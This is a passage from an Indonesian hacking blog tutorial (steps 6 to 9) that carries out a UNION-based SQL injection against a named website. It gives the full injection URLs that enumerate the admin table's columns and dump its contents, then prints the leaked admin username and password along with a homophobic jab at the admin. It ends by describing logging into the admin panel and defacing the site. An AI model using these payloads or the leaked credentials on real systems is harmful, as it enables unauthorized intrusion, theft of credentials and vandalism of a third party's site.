Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() . Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .
Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)
Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah “ group_concat(table_name) ” dengan perintah “ group_concat(column_name) ” dan mengganti perintah “ information_schema.tables “ menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=[hasil convert MySQL CHAR() - Step 6] ”
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns wheretable_name=CHAR(97, 100, 109, 105, 110)--
Kita mendapat kolom aid, admin id, admin pass di tabel admin.
Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name) menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass) dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ . disitu kita melihat ada tanda 0x3a. Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda : sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--
Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay --- adminnya bernama Bimo, orangnya Gay. Hihihi
Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin" ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder. Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://kkverma.com/admin
Masukkan user dan password sesuai dengan data yang telah kita dapat.
Dan.......
Uh, indahnya dunia ini. :v
Masuk halaman admin bray. Namun ternyata tidak bisa upload shell. Kita deface saja dengan metode JS Overlay.
Sekian tutorial kali ini, semoga bermanfaat.
Greetz : x'1n73ct
Content created by Yuyud HNc a.k.a Nabilaholic404
Copas tanpa Link Sumber = JANCOK
Labels:
Hacking
Subscribe to:
Posts (Atom)





























